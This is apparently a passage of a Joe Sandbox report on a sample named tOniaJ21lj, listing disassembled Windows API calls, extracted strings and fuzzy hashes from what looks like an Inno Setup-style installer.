                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                      • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                      • API String ID: 2573145106-3235461205
                                                                                      • Opcode ID: b905d95b21eb16817882d878bed5eaf33046abd5eff07b3401a45a878f64f984
                                                                                      • Instruction ID: 30010b37e156efe240ce284c3751ee9f3f87d85e2b6a261707359958cd490efa
                                                                                      • Opcode Fuzzy Hash: b905d95b21eb16817882d878bed5eaf33046abd5eff07b3401a45a878f64f984
                                                                                      • Instruction Fuzzy Hash: 9801A234604204AFDB10FBA98D12A2A77E8EB49710F9104B7F910E73D3DA7D9D08861C
                                                                                      APIs
                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 004732D0
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004733C7,0pI,00000000), ref: 004732E3
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004732E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                      • String ID: AllowSetForegroundWindow$user32.dll
                                                                                      • API String ID: 1782028327-3855017861
                                                                                      • Opcode ID: d3186cc3dc794e7465d39709d056f6715875b1f20938bb44e2ef386321cd694c
                                                                                      • Instruction ID: 249699eff17dbda02fe1af5a7c4854b1352fabbd495b9b7335dc6b3b1f0a0c65
                                                                                      • Opcode Fuzzy Hash: d3186cc3dc794e7465d39709d056f6715875b1f20938bb44e2ef386321cd694c
                                                                                      • Instruction Fuzzy Hash: DBD05E9020070275D9107AF54D47D5B224C8984712710857B3414F6183CD3CDA006A6D
                                                                                      APIs
                                                                                      • BeginPaint.USER32(00000000,?), ref: 00416BC2
                                                                                      • SaveDC.GDI32(?), ref: 00416BF3
                                                                                      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416CB5), ref: 00416C54
                                                                                      • RestoreDC.GDI32(?,?), ref: 00416C7B
                                                                                      • EndPaint.USER32(00000000,?,00416CBC,00000000,00416CB5), ref: 00416CAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                      • String ID:
                                                                                      • API String ID: 3808407030-0
                                                                                      • Opcode ID: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                                      • Instruction ID: 41fb8ea60d97978a9acdf236596d3a8a0d8a1996066437b2b943a95edf1585a8
                                                                                      • Opcode Fuzzy Hash: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                                      • Instruction Fuzzy Hash: BF414E70A042049FDB14DB99C989FAA77F9EB48304F1580AEE4459B362D778DD40CB58
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                                      • Instruction ID: 41a7722d09b35ce9ade17cd18fdec9692d257bae8bd1aa266952c484067d5cda
                                                                                      • Opcode Fuzzy Hash: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                                      • Instruction Fuzzy Hash: D3311F746047409FC320EB69C584BABB7E8AF89714F04991EF9E5C7791D738EC818B19
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429778
                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004297A7
                                                                                      • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 004297C3
                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 004297EE
                                                                                      • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042980C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                                      • Instruction ID: 5c059f72bad19c8464015bcf3ba3f3fa2ba546ca9f5ab3c2e37583cf1b766786
                                                                                      • Opcode Fuzzy Hash: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                                      • Instruction Fuzzy Hash: 2E217F70710714BAE710ABA6DC82F5B77ACEB46708F90443EB501BB3D2DB78AD41865C
                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BB3A
                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BB44
                                                                                      • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BB82
                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BCED,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BBC9
                                                                                      • DeleteObject.GDI32(00000000), ref: 0041BC0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$A16310A570DeleteObject
                                                                                      • String ID:
                                                                                      • API String ID: 2246927583-0
                                                                                      • Opcode ID: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                                      • Instruction ID: e64c8cfb77975bfe1c5019289902123c5e37d94f13133d85ba8c481b6df62587
                                                                                      • Opcode Fuzzy Hash: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                                      • Instruction Fuzzy Hash: 91316F74E00609EFDB00DFA5C941AAEB7F4EB48700F10846AF510AB781D7389E80DB98
                                                                                      APIs
                                                                                        • Part of subcall function 0045B728: SetLastError.KERNEL32(00000057,00000000,0045B7F4,?,?,?,?,00000000), ref: 0045B793
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0046F3D8,?,?,00000001,00497154), ref: 0046F391
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0046F3D8,?,?,00000001,00497154), ref: 0046F3A7
                                                                                      Strings
                                                                                      • Setting permissions on registry key: %s\%s, xrefs: 0046F356
                                                                                      • Failed to set permissions on registry key (%d)., xrefs: 0046F3B8
                                                                                      • Could not set permissions on the registry key because it currently does not exist., xrefs: 0046F39B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                      • API String ID: 1452528299-4018462623
                                                                                      • Opcode ID: 788c315b7af78b705df02674c92daeb7f44be0388b74eefc3bf89a14f2c9356d
                                                                                      • Instruction ID: ef7c6c74ecef8c5dcb146dfdc27ea61306564732d519a6a89d10c305d013d1cf
                                                                                      • Opcode Fuzzy Hash: 788c315b7af78b705df02674c92daeb7f44be0388b74eefc3bf89a14f2c9356d
                                                                                      • Instruction Fuzzy Hash: B421AA70A046445FCB00DBA9D8816AEBBE8EF49314F50417FE844E7392E7785D49876A
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                      • String ID:
                                                                                      • API String ID: 262959230-0
                                                                                      • Opcode ID: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                                      • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                      • Opcode Fuzzy Hash: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                                      • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                      APIs
                                                                                      • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414389
                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414391
                                                                                      • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143A5
                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143AB
                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A022A08830$A480
                                                                                      • String ID:
                                                                                      • API String ID: 3036329673-0
                                                                                      • Opcode ID: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                                      • Instruction ID: 94861c3129a932f854b236b0087f7367a4de39103189020794ca85cb03cdcc47
                                                                                      • Opcode Fuzzy Hash: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                                      • Instruction Fuzzy Hash: 6F01DF7121C3806AD200B63E8C85A9F6BED8FCA314F15556EF498DB382CA7ACC018765
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,T=d,?,?,?,004018B4), ref: 00401566
                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,T=d,?,?,?,004018B4), ref: 0040158B
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,T=d,?,?,?,004018B4), ref: 004015B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Alloc$Free
                                                                                      • String ID: T=d$d=d
                                                                                      • API String ID: 3668210933-3726205262
                                                                                      • Opcode ID: d2517b2848a3e48debd733cbcc194f1d7450fe1c69e1d9f9fa61647bd21528fe
                                                                                      • Instruction ID: 5797ca947971a1fa5f0c07c4efe461a423a426aef50e25704ee96cdc5a06cd6d
                                                                                      • Opcode Fuzzy Hash: d2517b2848a3e48debd733cbcc194f1d7450fe1c69e1d9f9fa61647bd21528fe
                                                                                      • Instruction Fuzzy Hash: C5F0C8716403206AEB315A694C85F133AD4DBC5794F104075BE09FF3D9D6B8980082AC
                                                                                      APIs
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,00476DAD,?,00000000,00000000,00000001,00000000,00475851,?,00000000), ref: 00475815
                                                                                      Strings
                                                                                      • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00475689
                                                                                      • pUG, xrefs: 004756AE
                                                                                      • Failed to parse "reg" constant, xrefs: 0047581C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant$pUG
                                                                                      • API String ID: 3535843008-1176165611
                                                                                      • Opcode ID: 3642018d57e9592f06bab58574b61b62b6ca112a26629dc16a5ab29dcfff1776
                                                                                      • Instruction ID: a53c2b258f7a770121dbc7a1e713ee2373e0806090ae57177e88baa161e34d04
                                                                                      • Opcode Fuzzy Hash: 3642018d57e9592f06bab58574b61b62b6ca112a26629dc16a5ab29dcfff1776
                                                                                      • Instruction Fuzzy Hash: 93816274E00548AFCB10EF95D481ADEBBF9AF48314F50C16AE418BB391D778AE05CB99
                                                                                      APIs
                                                                                        • Part of subcall function 0041EFE4: GetActiveWindow.USER32 ref: 0041EFE7
                                                                                        • Part of subcall function 0041EFE4: GetCurrentThreadId.KERNEL32 ref: 0041EFFC
                                                                                        • Part of subcall function 0041EFE4: 73A15940.USER32(00000000,Function_0001EFC0), ref: 0041F002
                                                                                        • Part of subcall function 00423118: GetSystemMetrics.USER32(00000000), ref: 0042311A
                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424D39
                                                                                      • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424DFC
                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424E0D
                                                                                        • Part of subcall function 004234D4: GetCurrentThreadId.KERNEL32 ref: 004234E9
                                                                                        • Part of subcall function 004234D4: SetWindowsHookExA.USER32(00000003,00423490,00000000,00000000), ref: 004234F9
                                                                                        • Part of subcall function 004234D4: CreateThread.KERNEL32(00000000,000003E8,00423440,00000000,00000000), ref: 0042351D
                                                                                        • Part of subcall function 00424A9C: SetTimer.USER32(00000000,00000001,?,00423424), ref: 00424AB7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CurrentOffsetRect$A15940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                                      • String ID: KB
                                                                                      • API String ID: 4121718042-1869488878
                                                                                      • Opcode ID: fd017592340e6a7deae3be5c789b7c506f4553282bb9063ebaa9b04636988139
                                                                                      • Instruction ID: 8a1ca8d85bab54549b4d9d093631307a73357c8a1ef7de59c5480922928757da
                                                                                      • Opcode Fuzzy Hash: fd017592340e6a7deae3be5c789b7c506f4553282bb9063ebaa9b04636988139
                                                                                      • Instruction Fuzzy Hash: D6811771A002189FDB14DFA8D884ADEBBB5FF48314F5045AAE904AB296DB38AD45CF44
                                                                                      APIs
                                                                                      • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406F6B
                                                                                      • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00406FE5
                                                                                      • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 0040703D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$NameOpenResourceUniversal
                                                                                      • String ID: Z
                                                                                      • API String ID: 3604996873-1505515367
                                                                                      • Opcode ID: 92ba5960390d49c3d5abeb35786e3f2b2430fe15f73cbae2fbe59e8f9896e220
                                                                                      • Instruction ID: f15ffb13b1197877662b480f320dceb00dd84bb003a9336f5ebe52512d9587e7
                                                                                      • Opcode Fuzzy Hash: 92ba5960390d49c3d5abeb35786e3f2b2430fe15f73cbae2fbe59e8f9896e220
                                                                                      • Instruction Fuzzy Hash: B2515170E042099FDB11EF55C941A9EBBB9FB09304F5041BAE540BB3D1C778AE418F5A
                                                                                      APIs
                                                                                      • SetRectEmpty.USER32(?), ref: 0044CA82
                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044CAAD
                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044CB35
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText$EmptyRect
                                                                                      • String ID:
                                                                                      • API String ID: 182455014-2867612384
                                                                                      • Opcode ID: dec825a9aee2c6b09e518825b83954473c9bd52475d7aaf62d715cc4f9536ee8
                                                                                      • Instruction ID: f2b81961a5c9452665bafda12c1e8f4b26a8e6b06f7f6a997a3587ccb4a7b75e
                                                                                      • Opcode Fuzzy Hash: dec825a9aee2c6b09e518825b83954473c9bd52475d7aaf62d715cc4f9536ee8
                                                                                      • Instruction Fuzzy Hash: 6B516171900248AFDB50DFA5C8C5BDEBBF9EF49308F08447AE845EB251D778A944CB64
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,00000000,0042EB20,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E9F6
                                                                                        • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0042EA19
                                                                                      • 73A0A480.USER32(00000000,?,0042EB05,00000000,0042EAFE,?,00000000,00000000,0042EB20,?,?,?,?,00000000,00000000,00000000), ref: 0042EAF8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                      • String ID: ...\
                                                                                      • API String ID: 2998766281-983595016
                                                                                      • Opcode ID: b314a03392ad466b231ea2b72e8a3a9b21c4fc795225b8958865863d61eb2cce
                                                                                      • Instruction ID: f87e9a1f05be7c7dd371759d08ccf2a788e9820b1ab6f676742360811e2f955b
                                                                                      • Opcode Fuzzy Hash: b314a03392ad466b231ea2b72e8a3a9b21c4fc795225b8958865863d61eb2cce
                                                                                      • Instruction Fuzzy Hash: 66315270B00128ABDF11EB9AD841BAEBBB8FF48304F91447BF410A7291D7789E45CA59
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004915B5,_iu,?,00000000,004525FE), ref: 004525B3
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004915B5,_iu,?,00000000,004525FE), ref: 004525C3
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle
                                                                                      • String ID: .tmp$_iu
                                                                                      • API String ID: 3498533004-10593223
                                                                                      • Opcode ID: 0390d67cb0cdb1cdfe7b265348a3f126b325b0e84e7214b7738f97ac8063fbc8
                                                                                      • Instruction ID: e65077276ccf3fce125a3b1cef4711b6e1a57cb68d75bf9d1e013844d831b580
                                                                                      • Opcode Fuzzy Hash: 0390d67cb0cdb1cdfe7b265348a3f126b325b0e84e7214b7738f97ac8063fbc8
                                                                                      • Instruction Fuzzy Hash: CF31B870A40209ABCB11EBA5C942B9EBBB5AF45309F60447BF804B73C2E7785F05876D
                                                                                      APIs
                                                                                      • GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                                      • UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                                      • RegisterClassA.USER32(?), ref: 0041643E
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Class$InfoRegisterUnregister
                                                                                      • String ID: @
                                                                                      • API String ID: 3749476976-2766056989
                                                                                      • Opcode ID: 5cbec8acbea9e71dae0b2083da7465dc5d1b6b33c382e5651f178c5e9f182fd1
                                                                                      • Instruction ID: e8561198b81c08f142b3a544c89b4739d35f798691a26b07e42a1fbbf62ba06a
                                                                                      • Opcode Fuzzy Hash: 5cbec8acbea9e71dae0b2083da7465dc5d1b6b33c382e5651f178c5e9f182fd1
                                                                                      • Instruction Fuzzy Hash: 94316E706042058BD760EF68C981B9B77E5AB88308F04447FF985DB392DB39D9448B6E
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(00000000,00493199,00000000,004929C2,?,?,00000000,00496628), ref: 0049293C
                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00493199,00000000,004929C2,?,?,00000000,00496628), ref: 00492965
                                                                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0049297E
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$Move
                                                                                      • String ID: isRS-%.3u.tmp
                                                                                      • API String ID: 3839737484-3657609586
                                                                                      • Opcode ID: ca7de64efd1a81cfe0b197b1df468b3a71946ac3222c8e5426d60e2b27b10d4a
                                                                                      • Instruction ID: f317836663e3456f6962b38be5478bf9a68de7f196930fcf54a7ed662431e31d
                                                                                      • Opcode Fuzzy Hash: ca7de64efd1a81cfe0b197b1df468b3a71946ac3222c8e5426d60e2b27b10d4a
                                                                                      • Instruction Fuzzy Hash: 682175B1E00219BFCF01EFA9C981AAFBBB8EF44314F10453BB814B72D1D6785E018A59
                                                                                      APIs
                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
